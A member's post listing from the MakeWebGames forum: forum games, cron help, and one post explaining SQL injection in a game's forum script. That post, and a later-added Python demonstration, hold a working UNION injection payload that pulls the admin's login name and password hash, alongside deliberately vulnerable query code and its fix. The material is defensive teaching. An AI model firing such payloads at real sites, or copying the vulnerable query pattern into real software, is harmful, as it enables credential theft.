MakeWebGames

Spudinski (Members)

  • Posts: 1,731
  • Days Won: 5

Everything posted by Spudinski

  1. Re: Clean up cron It is never a good idea to delete content, especially users and forum posts. You could rather send the users an email, and tell them that their account indeed still exists. Also, removing unimportant logs is fine, but deleting other types of logs, such as access logs, is not a very good idea. But for this purpose, a game, it is fine, though I would like to suggest keeping logs for a longer period than 30 days; you might find it very useful to have older logs.
  2. Re: 3 Word Game * He's not supposed to die.. the way to
  3. Re: 3 Word Game help but tragically
  4. Re: Count Backwards :D 4982
  5. Re: 3 Word Game and went to
  6. Re: Guess the next poster (: Yep. Killah next...
  7. Re: 3 Word Game and then he
  8. Re: Counting (nr game) 1842
  9. Re: crons Please post the actual cron file that is supposed to update the stats you mentioned above.
  10. Re: forum SQL injection Someone recently posted a small forum modification for mccodes, I think it may be for all versions. Having a forum application is unnecessary, since you only need it to host posts, not a PM system or things like that. Unless you want to make an addition, if it is going to be used a lot. I think Amazon Survival did the right thing when it came to them, they are using a forum application (vBulletin), outside of their main game, that way you can give help to visitors that might have a problem. To give an answer to the original question: I don't have mccodes version 2, that has the vulnerability, so I cannot say for sure. Although it would probably be a simple case of the input variable not being sanitised, see examples below. The URL would normally be http://www.example.com/forums.php?cat_id=1, but it can be compromised by someone, making it:

    http://www.example.com/forums.php?cat_id=-1 UNION ALL SELECT NULL, NULL, USER(), HOST(), userpass, login_name, NULL, NULL FROM users WHERE userid=1 --

    Anyone that knows MySQL would know what that would do. Here is the type of programming that would be vulnerable to such input strings.

    <?php
    // Vulnerable: the request parameter is concatenated straight into the SQL text.
    $cat_id = $_GET['cat_id'];
    $query_txt = 'SELECT * FROM `categories` WHERE `cat_id` = \'' . $cat_id . '\'';
    $query = mysql_query($query_txt);
    while ($data = mysql_fetch_assoc($query)) {
        // ...
    }
    ?>

    A simple fix would be just to check if the input string is numeric.

    <?php
    // Fixed: only an all-digit value is accepted; anything else falls back to category 1.
    $cat_id = (preg_match('/^[0-9]+$/i', $_GET['cat_id']) ? $_GET['cat_id'] : 1); // assuming cat_id 1 exists.
    $query_txt = 'SELECT * FROM `categories` WHERE `cat_id` = \'' . $cat_id . '\'';
    $query = mysql_query($query_txt);
    while ($data = mysql_fetch_assoc($query)) {
        // ...
    }
    ?>

    Hope it answers your question.
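The injection described in the post above, as an added example in Python (not the post's code and not mccodes' code): it builds the query the same way the vulnerable snippet does and runs the UNION payload against an in-memory SQLite database standing in for MySQL. Because the snippet wraps the value in single quotes, the payload has to close that quote first (`-1'` rather than `-1`), and since SQLite has no USER()/HOST() those two columns are replaced with string literals. The `categories` and `users` table layouts, the column names and the sample rows are all constructed assumptions. The hardened function applies the post's numeric whitelist and, going beyond the post's fix, also binds the value as a query parameter so it never becomes part of the SQL text.

```python
import re
import sqlite3

# Constructed stand-in for the mccodes `categories` (8 columns, so the 8-column
# UNION payload lines up) and `users` tables. Names and rows are assumptions.
SCHEMA = """
CREATE TABLE categories (
    cat_id INTEGER PRIMARY KEY, cat_name TEXT, cat_desc TEXT, cat_owner TEXT,
    c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT
);
CREATE TABLE users (
    userid INTEGER PRIMARY KEY, login_name TEXT, userpass TEXT
);
INSERT INTO categories VALUES (1, 'General', 'Talk about anything', 'admin', NULL, NULL, NULL, NULL);
INSERT INTO categories VALUES (2, 'Support', 'Ask for help', 'admin', NULL, NULL, NULL, NULL);
INSERT INTO users VALUES (1, 'admin', 'secret-hash');
"""

# The post's payload, adapted: the leading quote closes the string literal the
# vulnerable query wraps around cat_id, USER()/HOST() become literals because
# SQLite lacks them, and the trailing space after "--" keeps the comment valid
# on MySQL too (MySQL requires whitespace after "--").
PAYLOAD = ("-1' UNION ALL SELECT NULL, NULL, 'db-user', 'db-host', "
           "userpass, login_name, NULL, NULL FROM users WHERE userid=1 -- ")


def connect():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_category_vulnerable(conn, cat_id):
    """Mirrors the vulnerable PHP: the request value is spliced into the SQL text."""
    sql = "SELECT * FROM categories WHERE cat_id = '" + cat_id + "'"
    return conn.execute(sql).fetchall()


def fetch_category_hardened(conn, cat_id, default_cat=1):
    """The post's numeric whitelist plus parameter binding.

    re.fullmatch is used instead of ^...$ because `$` also matches just before a
    trailing newline, so "1\\n" would otherwise pass the check.
    """
    if not re.fullmatch(r"[0-9]+", cat_id):
        cat_id = str(default_cat)  # assumes category `default_cat` exists
    sql = "SELECT * FROM categories WHERE cat_id = ?"
    return conn.execute(sql, (int(cat_id),)).fetchall()


def demo():
    """Run both variants against the payload; returns (leaked_rows, safe_rows)."""
    conn = connect()
    leaked = fetch_category_vulnerable(conn, PAYLOAD)
    safe = fetch_category_hardened(conn, PAYLOAD)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable query returned:", leaked)
    print("hardened query returned:  ", safe)
```

The vulnerable call returns a row whose fifth and sixth columns are the admin's password hash and login name, pulled from `users` even though the query was written against `categories`; the hardened call never sees the payload as SQL and simply serves the default category.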
  11. Re: crons It might be your host, that would be the most likely thing. If you doubt it is that, try entering your email at the crontabs page(cPanel), and look at the output.
  12. Re: crons Have you enabled/added the cron script yet? If not - there is a good tutorial to do it in the FAQ section.
  13. Re: Movies I watched School of Scoundrels again with a friend last night, pretty good. Hitman I have also seen recently, quite good.
  14. Re: Staff Password without sql's. (ANY VERSION) I agree with Nyna, it would be much better that way. And when you decide you want to make it with password from a mysql table, you just combine the both, PHP has some nice functions to work with Apache authentication methods.
  15. Re: Tables ID It would take a few milliseconds (0.004?) to alter the AUTO_INCREMENT value of a table. It would take about 5 minutes to do the way you are suggesting.
  16. Re: Guess Who! The goal of this thread is for any possible problems that may occur, or if someone wants to say something productive about the modification, so lets keep it that way. (:
  17. Re: Guess Who! Thank you Ammo, but the script does detect what version you have, and makes changes based on that. I got the idea from Isomerizer *thanks*.
  18. Re: Guess Who! I made it free? lol, I updated the post above.
  19. Re: Introductions Hi, welcome to the forums. There are a lot of useful resources here, so I'm sure you will learn a lot.
  20. Re: Tables ID Somewhere somehow your script must have made an addition of 90+ rows to the table, and then deleted it. No need to delete the whole thing, just reset the AUTO_INCREMENT value. I reckon you have set the ids of the cities already, so based upon your last id, modify the following: ALTER TABLE `cities` AUTO_INCREMENT = 12 The number, change it to the last id in the table, plus one. Now just run that in phpmyadmin and it should be fine.
  21. Re: Staff Password without sql's. (ANY VERSION) A problem I can already see that will happen with some passwords they might choose. You really do not have to clean strings that are going to be compared with variables/plaintext.
  22. Re: Counting (nr game) 1840
  23. Re: Guess the next poster Nope, riderdaz.
  24. Re: Guess the next poster No. -Matt- next.
  25. Re: TwIsTeD WiShEs ! Granted. People start to think they know everything and start to show off the whole time. I wish I could get a 100% accuracy on all songs in FoF... (: